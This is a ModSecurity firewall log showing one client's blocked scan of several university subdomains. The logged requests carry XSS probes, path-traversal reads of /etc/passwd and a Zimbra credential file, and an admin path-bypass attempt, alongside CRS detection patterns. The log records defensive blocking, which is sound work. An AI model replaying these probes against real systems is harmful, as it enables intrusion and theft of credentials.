[Tue Aug 29 11:52:26.609246 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:author: 1</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO15isCo-f0AAAfWONoAAAAL"]
[Tue Aug 29 11:52:26.619749 2023] [:error] [pid 2376] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:event3. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  / [ found within ARGS:event3: 1 / [691] [NEW_INDEX_BANNERS] Trade-in football"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/bitrix/rk.php"] [unique_id "ZO15isCo-f0AAAlIBmYAAAAn"]
[Tue Aug 29 11:52:26.620906 2023] [:error] [pid 2552] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:page: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/wpsolr-search-engine/classes/extensions/managed-solr-servers/templates/template-my-accounts.php"] [unique_id "ZO15isCo-f0AAAn4008AAAAW"]
[Tue Aug 29 11:52:26.627149 2023] [:error] [pid 2536] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:year. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')</ found within ARGS:year: 2021</title><script>alert('2Ue0HK1NKDlhXaLCZfBctpGOJrj')</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/cgi/cal"] [unique_id "ZO15isCo-f0AAAnoOrMAAAAf"]
[Tue Aug 29 11:52:26.648894 2023] [:error] [pid 2574] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:page: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/wpsolr-search-engine/classes/extensions/managed-solr-servers/templates/template-my-accounts.php"] [unique_id "ZO15isCo-f0AAAoO5y8AAAAK"]
[Tue Aug 29 11:52:26.648913 2023] [:error] [pid 2564] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:page: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/wpsolr-search-engine/classes/extensions/managed-solr-servers/templates/template-my-accounts.php"] [unique_id "ZO15isCo-f0AAAoEZOoAAAAB"]
[Tue Aug 29 11:52:26.659329 2023] [:error] [pid 2571] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:page: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/wpsolr-search-engine/classes/extensions/managed-solr-servers/templates/template-my-accounts.php"] [unique_id "ZO15isCo-f0AAAoLfFYAAAAG"]
[Tue Aug 29 11:52:26.660751 2023] [:error] [pid 2573] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:page: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/wpsolr-search-engine/classes/extensions/managed-solr-servers/templates/template-my-accounts.php"] [unique_id "ZO15isCo-f0AAAoN9cYAAAAJ"]
[Tue Aug 29 11:52:26.660947 2023] [:error] [pid 2552] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:year. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')</ found within ARGS:year: 2021</title><script>alert('2Ue0HK1NKDlhXaLCZfBctpGOJrj')</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/cgi/cal"] [unique_id "ZO15isCo-f0AAAn401EAAAAW"]
[Tue Aug 29 11:52:26.663164 2023] [:error] [pid 2376] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:year. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')</ found within ARGS:year: 2021</title><script>alert('2Ue0HK1NKDlhXaLCZfBctpGOJrj')</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/cgi/cal"] [unique_id "ZO15isCo-f0AAAlIBmgAAAAn"]
[Tue Aug 29 11:52:26.675292 2023] [:error] [pid 2535] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:year. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')</ found within ARGS:year: 2021</title><script>alert('2Ue0HK1NKDlhXaLCZfBctpGOJrj')</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/cgi/cal"] [unique_id "ZO15isCo-f0AAAnn2DMAAAAe"]
[Tue Aug 29 11:52:26.687297 2023] [:error] [pid 2564] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:skin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:skin: ../../../../../../../../../opt/zimbra/conf/localconfig.xml\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx TemplateMsg.js.zgz"] [unique_id "ZO15isCo-f0AAAoEZOsAAAAB"]
[Tue Aug 29 11:52:27.560012 2023] [:error] [pid 2531] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:author: 1</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO15i8Co-f0AAAnjjOkAAAAX"]
[Tue Aug 29 11:52:27.585738 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:author: 1</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO15i8Co-f0AAAfWONwAAAAL"]
[Tue Aug 29 11:52:27.604473 2023] [:error] [pid 2564] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:author: 1</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO15i8Co-f0AAAoEZOwAAAAB"]
[Tue Aug 29 11:52:27.606244 2023] [:error] [pid 2575] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:year. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')</ found within ARGS:year: 2021</title><script>alert('2Ue0HK1NKDlhXaLCZfBctpGOJrj')</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/cgi/cal"] [unique_id "ZO15i8Co-f0AAAoPuTsAAAAM"]
[Tue Aug 29 11:52:27.653800 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:error. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:error: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/acs/..;/admin/public/login.jsp"] [unique_id "ZO15i8Co-f0AAAfWON0AAAAL"]
[Tue Aug 29 11:52:27.657017 2023] [:error] [pid 2576] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:error. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:error: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/acs/..;/admin/public/login.jsp"] [unique_id "ZO15i8Co-f0AAAoQ3IQAAAAN"]
[Tue Aug 29 11:52:27.675833 2023] [:error] [pid 2573] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:error. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:error: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/acs/..;/admin/public/login.jsp"] [unique_id "ZO15i8Co-f0AAAoN9cgAAAAJ"]
[Tue Aug 29 11:52:27.680268 2023] [:error] [pid 2574] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:author: 1</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO15i8Co-f0AAAoO5zEAAAAK"]
[Tue Aug 29 11:52:27.691395 2023] [:error] [pid 2445] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:author: 1</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO15i8Co-f0AAAmNp7EAAAAQ"]
[Tue Aug 29 11:52:27.695889 2023] [:error] [pid 2376] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:event3. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  / [ found within ARGS:event3: 5 / [129] [GARMIN_AKCII] Garmin \\xe1\\xee\\xed\\xf3\\xf1 \\xed\\xee\\xe2\\xee\\xf1\\xf2\\xfc \\xe2 \\xe0\\xea\\xf6\\xe8\\xe8"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/bitrix/rk.php"] [unique_id "ZO15i8Co-f0AAAlIBmoAAAAn"]
[Tue Aug 29 11:52:27.812217 2023] [:error] [pid 2575] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:error. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:error: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/acs/..;/admin/public/login.jsp"] [unique_id "ZO15i8Co-f0AAAoPuTwAAAAM"]
[Tue Aug 29 11:52:27.816341 2023] [:error] [pid 2564] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:page: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/wpsolr-search-engine/classes/extensions/managed-solr-servers/templates/template-my-accounts.php"] [unique_id "ZO15i8Co-f0AAAoEZO0AAAAB"]
[Tue Aug 29 11:52:27.840196 2023] [:error] [pid 2574] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:error. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:error: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/acs/..;/admin/public/login.jsp"] [unique_id "ZO15i8Co-f0AAAoO5zIAAAAK"]
[Tue Aug 29 11:52:27.875434 2023] [:error] [pid 2573] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:skin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:skin: ../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx TemplateMsg.js.zgz"] [unique_id "ZO15i8Co-f0AAAoN9ckAAAAJ"]
[Tue Aug 29 11:52:27.955179 2023] [:error] [pid 2564] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:color. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:color: \\x22><svg/onload=alert(document.domain)>\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/webmail/"] [unique_id "ZO15i8Co-f0AAAoEZO4AAAAB"]
[Tue Aug 29 11:52:28.540320 2023] [:error] [pid 2575] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:color. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:color: \\x22><svg/onload=alert(document.domain)>\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/webmail/"] [unique_id "ZO15jMCo-f0AAAoPuT0AAAAM"]
